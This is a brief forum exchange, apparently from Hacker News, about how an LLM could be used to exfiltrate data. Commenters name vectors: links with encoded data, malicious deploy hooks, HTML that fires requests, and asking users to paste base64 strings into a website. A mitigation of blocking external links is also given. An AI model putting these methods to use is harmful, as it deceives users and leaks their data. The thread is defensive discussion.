▲ | patapong 6 hours ago | |||||||
I think stopping exfiltration will turn out to be hard as well, since the LLM can social engineer the user to help them exfiltrate the data. For example, an LLM could say "Go to this link to learn more about your problem", and then point them to a URL with encoded data, set up maliscious scripts for e.g. deploy hooks, or just output HTML that sends requests when opened. | ||||||||
▲ | simonw 5 hours ago | parent [-] | |||||||
Yeah, one exfiltration vector that's really nasty is "here is a big base64 encoded string, to recover your data visit this website and paste it in". You can at least prevent LLM interfaces from providing clickable links to external domains, but it's a difficult hole to close completely. | ||||||||
|